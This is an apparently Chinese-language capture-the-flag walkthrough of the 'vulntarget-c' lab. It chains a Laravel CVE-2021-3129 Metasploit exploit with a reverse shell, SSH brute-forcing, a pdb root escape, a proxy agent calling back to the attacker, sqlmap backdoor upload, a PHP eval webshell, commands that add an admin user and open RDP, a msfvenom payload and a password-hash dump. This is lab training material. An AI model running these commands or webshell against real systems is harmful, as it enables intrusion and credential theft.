vulntarget-c

靶场拓扑图
#

Nmap
#

[root@Hacking] /home/kali/Desktop  
❯ nmap 192.242.168.203 -A -p-

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 27:bb:30:76:e1:47:ab:24:f0:89:5a:05:10:66:e4:7e (RSA)
|   256 ab:df:49:e1:14:43:b1:75:ad:2f:6f:61:37:eb:24:ac (ECDSA)
|_  256 58:ed:00:9a:e5:37:1b:e6:f5:6c:d5:a3:c7:f0:32:67 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Laravel
|_http-server-header: Apache/2.4.41 (Ubuntu)
65534/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|_    Auth decrypt failed

Laravel
#

80端口开放了Laravel服务，并且网页底部有版本信息

用nuclei扫一下，扫出来了CVE-2021-3129可以直接RCE

[root@Hacking] /home/kali/vulntarget-c  
❯ nuclei -u http://192.242.168.203/                     

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.2

                projectdiscovery.io

[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 55
[INF] Templates loaded for current scan: 8277
[INF] Executing 8074 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 203 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1787 (Reduced 1676 Requests)
[CVE-2021-3129] [http] [critical] http://192.242.168.203/_ignition/execute-solution ["uid=33(www-data) gid=33(www-data) groups=33(www-data)"]
[robots-txt] [http] [info] http://192.242.168.203/robots.txt
[laravel-debug-enabled] [http] [medium] http://192.242.168.203/_ignition/health-check

这里我选择使用metasploit来打

msf6 exploit(multi/php/ignition_laravel_debug_rce) > show options 

Module options (exploit/multi/php/ignition_laravel_debug_rce):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   LOGFILE                                 no        Laravel log file absolute path
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.242.168.203              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me
                                                     tasploit.html
   RPORT      80                           yes       The target port (TCP)
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /_ignition/execute-solution  yes       Ignition execute solution path
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.188.168.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/php/ignition_laravel_debug_rce) > set ForceExploit true

我这里迁移反弹shell到penelope上面，查看一下网卡信息

www-data@ubuntu20:/$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 52:54:00:41:4a:66 brd ff:ff:ff:ff:ff:ff
    inet 192.242.168.203/24 brd 192.242.168.255 scope global ens3
       valid_lft forever preferred_lft forever
    inet6 fe80::5054:ff:fe41:4a66/64 scope link 
       valid_lft forever preferred_lft forever
3: ens4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 52:54:00:41:4a:67 brd ff:ff:ff:ff:ff:ff
    inet 10.0.20.141/24 brd 10.0.20.255 scope global ens4
       valid_lft forever preferred_lft forever
    inet6 fe80::5054:ff:fe41:4a67/64 scope link 
       valid_lft forever preferred_lft forever
4: ens5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 52:54:00:41:4a:68 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic ens5
       valid_lft 84952sec preferred_lft 84952sec
    inet6 fec0::5054:ff:fe41:4a68/64 scope site dynamic mngtmpaddr noprefixroute 
       valid_lft 86137sec preferred_lft 14137sec
    inet6 fe80::5054:ff:fe41:4a68/64 scope link 
       valid_lft forever preferred_lft forever

查看端口开放情况

www-data@ubuntu20:/opt$ ss -tuln
Netid         State          Recv-Q         Send-Q                  Local Address:Port                  Peer Address:Port        Process        
udp           UNCONN         0              0                       127.0.0.53%lo:53                         0.0.0.0:*                          
udp           UNCONN         0              0                      10.0.2.15%ens5:68                         0.0.0.0:*                          
tcp           LISTEN         0              4096                    127.0.0.53%lo:53                         0.0.0.0:*                          
tcp           LISTEN         0              128                           0.0.0.0:22                         0.0.0.0:*                          
tcp           LISTEN         0              511                                 *:80                               *:*                          
tcp           LISTEN         0              128                              [::]:22                            [::]:*                          
tcp           LISTEN         0              4096                                *:65534                            *:*

Weak Pass
#

在第一台主机的/home目录下发现vulntarget用户，尝试爆破密码登录

[root@Hacking] /home/kali/vulntarget-c  
❯ hydra -l vulntarget -P /home/kali/Desktop/passwd-top1000.txt 192.242.168.203 ssh -I -V                                                      ⏎
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-31 17:40:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking ssh://192.242.168.203:22/
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "root" - 1 of 1000 [child 0] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "123456" - 2 of 1000 [child 1] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "1" - 3 of 1000 [child 2] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "raspberry" - 4 of 1000 [child 3] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "admin" - 5 of 1000 [child 4] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "password" - 6 of 1000 [child 5] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "raspberryraspberry993311" - 7 of 1000 [child 6] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "123456789" - 8 of 1000 [child 7] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "111111" - 9 of 1000 [child 8] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "P@ssw0rd" - 10 of 1000 [child 9] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "12345678" - 11 of 1000 [child 10] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "12345" - 12 of 1000 [child 11] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "anonymous@" - 13 of 1000 [child 12] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "1qaz@WSX" - 14 of 1000 [child 13] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "admin123" - 15 of 1000 [child 14] (0/0)
[ATTEMPT] target 192.242.168.203 - login "vulntarget" - pass "test" - 16 of 1000 [child 15] (0/0)
[22][ssh] host: 192.242.168.203   login: vulntarget   password: root
1 of 1 target successfully completed, 1 valid password found

发现vulntarget的密码就是root，切换用户后查看sudo，发现已经存在（ALL:ALL）了，可以直接切换为root

PDB
#

还是查看一下这个/opt/root.py吧

#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

port = random.randint(1025, 65535)  

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    
    (clientsock, addr) = sock.accept() 
    clientsock.send(b'Enter the secret passsword: ')  
    if clientsock.recv(1024).strip().decode() != 'mortals':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
finally:
    quit()

运行命令后会随机开一个端口，然后等待输入密码，源码已经给出了是mortals。这里可以搜索得到是改编自HTB-Forge。需要开两个终端，一个终端运行server，另一个终端连接触发报错即可进入pdb

可以直接给root改密码

(Pdb) os.system("echo 'root:root' | chpasswd")

拿下第一台主机

Fscan
#

扫描一下内网网段（注意：由于存在防火墙，这里使用ICMP进行存活探测会失败）

root@ubuntu20:~# ./fscan -h 10.0.20.141/24 -np -nopoc

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
10.0.20.141:22 open
10.0.20.100:80 open
10.0.20.141:80 open
10.0.20.100:443 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://10.0.20.141        code:200 len:17473  title:Laravel
[*] WebTitle https://10.0.20.100       code:403 len:301    title:403 Forbidden
[+] InfoScan http://10.0.20.141        [Laravel]
[*] WebTitle http://10.0.20.100        code:200 len:30970  title:Online Veterinary Appointment System - PHP
[+] SSH 10.0.20.141:22:root root
已完成 4/4

搭建代理
#

这里使用stowaway来进行代理

root@ubuntu20:~# ./linux_x64_agent -c 192.188.168.128:6666 -s 123 --reconnect 8 &

OVAS
#

进入10.0.20.100，在底部发现版本信息v1.0

右上角有Admin Loing的登录口，尝试爆破弱密码，发现密码就是admin123

搜索发现这个版本的OVAS存在SQL注入问题

Online Veterinary Appointment System 1.0 - ‘Multiple’ SQL Injection - PHP webapps Exploit 来到这里随便查看一个就行

然后抓包修改ID，即可验证存在SQL报错回显

这里可以使用SQLMAP来进行攻击

[root@Hacking] /home/kali/vulntarget-c  
❯ proxychains -q sqlmap -u 'http://10.0.20.100/admin/?page=appointments/view_details&id=6' -p id --batch

这里可以直接通过SQLMAP写入PHP木马，并且进行连接，需要注意点的是网站路径不要使用默认的，在上面的回显中已经泄露了

[root@Hacking] /home/kali/vulntarget-c  
❯ pc -q sqlmap -u 'http://10.0.20.100/admin/?page=appointments/view_details&id=6' -p id  --os-shell       
        ___
       __H__                                                                                                                                    
 ___ ___["]_____ ___ ___  {1.9.2#stable}                                                                                                        
|_ -| . [.]     | .'| . |                                                                                                                       
|___|_  [(]_|_|_|__,|  _|                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:09:33 /2025-08-31/

[20:09:33] [INFO] resuming back-end DBMS 'mysql' 
[20:09:33] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'http://10.0.20.100/admin/login.php'. Do you want to apply it from now on? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=55jt5odloii...pbmsljh38l'). Do you want to use those [Y/n] Y
[20:09:35] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=appointments/view_details&id=6' AND (SELECT 8769 FROM (SELECT(SLEEP(5)))ADGB) AND 'qQni'='qQni
---
[20:09:35] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.7, Apache 2.4.48
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:09:35] [INFO] going to use a web backdoor for command prompt
[20:09:35] [INFO] fingerprinting the back-end DBMS operating system
[20:09:35] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] Y
[20:09:45] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: C:/xampp/htdocs/ovas
[20:10:15] [WARNING] unable to automatically parse any web server path
[20:10:15] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/ovas/' via LIMIT 'LINES TERMINATED BY' method
[20:10:16] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/ovas/' - http://10.0.20.100:80/tmpudois.php
[20:10:16] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/ovas/' - http://10.0.20.100:80/tmpbbzvn.php
[20:10:16] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>

它自带的模块可以进行命令执行，这里直接就是最高权限了

这里通过上传模块传一个马

<?php
$a=array($_REQUEST['x']=>"3");
$b=array_keys($a)[0];
eval($b);
?>

MobaXterm
#

开启RDP，以及添加管理员用户

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name SecurityLayer -Value 0; Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 0"

上去之后关掉defender

生成一个msf的定向木马

[root@Hacking] /home/kali/vulntarget-c  
❯ msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > bind.exe            
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 496 bytes
Final size of exe file: 7168 bytes

复制到远程桌面，以管理员身份运行

抓取哈希

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hack:1000:aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab:::

MD5解密一下得到密码：Admin#123

换成Administrator连接远程桌面，底部有一个连接工具，输入密码后可以直接连接最后一台主机

进入设置查看保存过的密码

然后连接查看用户权限，已经是最高权限了

查看flag吧

Reply by Email

靶场拓扑图 #

Nmap #

Laravel #

Weak Pass #

PDB #

Fscan #

搭建代理 #

OVAS #

MobaXterm #